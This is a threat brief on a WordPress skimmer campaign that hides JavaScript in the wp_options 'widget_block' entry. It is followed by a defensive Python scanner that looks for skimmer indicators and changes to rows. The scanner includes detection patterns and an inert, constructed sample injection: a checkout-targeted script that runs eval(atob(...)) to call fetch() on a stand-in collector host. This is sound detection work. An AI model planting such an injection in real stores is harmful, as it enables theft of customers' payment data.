Overview
A sophisticated new skimmer campaign targets WordPress e-commerce sites by injecting malicious JavaScript into database tables to steal payment data. The malware relies on manipulation of the wp_options table and on multi-layer encoding and encryption of the exfiltrated data.
Whom it may concern
- E-commerce website operators using WordPress
- Payment processors and merchants
- Security teams monitoring web applications
- Customers entering payment details
Key Findings
- Malware injects into the wp_options 'widget_block' entry for persistence
- Targets specific checkout pages using dynamic JavaScript injection
- Creates fake payment forms or hijacks legitimate fields
- Uses AES-CBC encryption and Base64 encoding for data exfiltration
Risk Analysis
- Attack Probability: High (widespread WordPress usage)
- Impact Severity: Critical (direct financial data theft)
- Detection Difficulty: High (the payload sits in a legitimate database location rather than in a file, so file-based scanners do not see it)
- Potential for large-scale credential theft
Action Items
- Implement integrity monitoring for database tables (in particular wp_options)
- Deploy enhanced WAF rules for suspicious JavaScript
- Audit WordPress admin panel access
- Monitor for suspicious database table modifications
- Run regular security scans of payment pages
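The Key Findings (JavaScript hidden in the wp_options 'widget_block' entry, checkout-page targeting, Base64 and AES-layered exfiltration) and the Action Items (monitor database tables for suspicious modifications) both translate into one defensive check: periodically export the watched wp_options rows, scan them for skimmer-style indicators, and compare them against a baseline snapshot. The following Python script is an added example written for this summary; it is not code from the source article or from any WordPress or vendor tool. It assumes rows were exported with `SELECT option_id, option_name, option_value FROM wp_options` into dictionaries with those three keys; the indicator list, the `watched_prefixes` parameter and the sample rows are all constructed for illustration, and the "malicious" sample is inert (its Base64 layer decodes to a `fetch()` against the reserved `.invalid` TLD and nothing executes it).

```python
"""Scan exported wp_options rows for skimmer-style JavaScript in block widgets.

Added example, not from the original brief or any vendor tool. Assumes rows were
exported with: SELECT option_id, option_name, option_value FROM wp_options
Field names, indicator list and sample rows are constructed for illustration.
"""
import base64
import hashlib
import re

# Indicator regexes (constructed): each one is weak on its own; combine before alerting.
SUSPICIOUS_PATTERNS = {
    "inline_script_tag": re.compile(r"<script\b", re.I),
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
    "dynamic_eval": re.compile(r"\b(eval|Function)\s*\(", re.I),
    "checkout_targeting": re.compile(r"checkout", re.I),
    "crypto_api": re.compile(r"crypto\.subtle|\bAES\b", re.I),
    "network_send": re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\b"),
}
HIGH_CONFIDENCE = {"inline_script_tag", "dynamic_eval", "base64_decode"}

# Quoted Base64-looking literals of 16+ chars are decoded and rescanned (second layer).
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def decode_base64_literals(value):
    """Return decoded text for every quoted Base64 literal in value; skip invalid ones."""
    decoded = []
    for match in B64_LITERAL.finditer(value):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        decoded.append(raw.decode("utf-8", "replace"))
    return decoded


def scan_option_value(value):
    """Return indicator names matching the value and, prefixed 'b64:', its decoded layers."""
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(value)]
    for layer in decode_base64_literals(value):
        hits += ["b64:" + name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(layer)]
    return hits


def scan_wp_options(rows, watched_prefixes=("widget_block",)):
    """Scan watched option names; return one finding per row that has any indicator."""
    findings = []
    for row in rows:
        if not row["option_name"].startswith(watched_prefixes):
            continue
        hits = scan_option_value(row["option_value"])
        if not hits:
            continue
        base_names = {h.split(":", 1)[-1] for h in hits}
        severity = "high" if base_names & HIGH_CONFIDENCE else "low"
        findings.append({"option_id": row["option_id"], "option_name": row["option_name"],
                         "severity": severity, "indicators": hits})
    return findings


def fingerprint(rows, watched_prefixes=("widget_block",)):
    """option_id -> SHA-256 of option_value for watched rows (baseline for change detection)."""
    return {r["option_id"]: hashlib.sha256(r["option_value"].encode()).hexdigest()
            for r in rows if r["option_name"].startswith(watched_prefixes)}


def diff_fingerprints(baseline, current):
    """Report watched rows added, removed or modified since the baseline snapshot."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k]),
    }


# Constructed sample rows. The "malicious" one is inert: its Base64 payload decodes to a
# fetch() against the reserved .invalid TLD, and nothing here executes it.
_INNER = "fetch('https://collector.invalid/')"
_B64 = base64.b64encode(_INNER.encode()).decode()
_CONTENT = ("<script>if(location.pathname.indexOf('checkout')>-1)"
            "{eval(atob('" + _B64 + "'))}</script>")
SAMPLE_ROWS = [
    {"option_id": 1, "option_name": "siteurl", "option_value": "https://shop.example"},
    {"option_id": 2, "option_name": "widget_block",
     "option_value": '{"2":{"content":"<!-- wp:paragraph --><p>Free shipping over $50</p><!-- /wp:paragraph -->"}}'},
    {"option_id": 3, "option_name": "widget_block",
     "option_value": '{"3":{"content":"' + _CONTENT + '"}}'},
]

if __name__ == "__main__":
    for finding in scan_wp_options(SAMPLE_ROWS):
        print(finding)
    baseline = fingerprint(SAMPLE_ROWS[:2])  # snapshot taken before the injected row existed
    print(diff_fingerprints(baseline, fingerprint(SAMPLE_ROWS)))
```

In practice the baseline dictionary is stored from a known-clean export and `diff_fingerprints` runs on each new export; any added or changed widget_block row is then passed through `scan_wp_options`. A lone `checkout_targeting` hit is expected on real stores (widgets legitimately link to checkout), which is why severity is only raised to high when an inline script tag, dynamic evaluation or Base64 decoding is also present.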
Sources
- [The Hacker News](https://thehackernews.com/2025/01/wordpress-skimmers-evade-detection-by.html)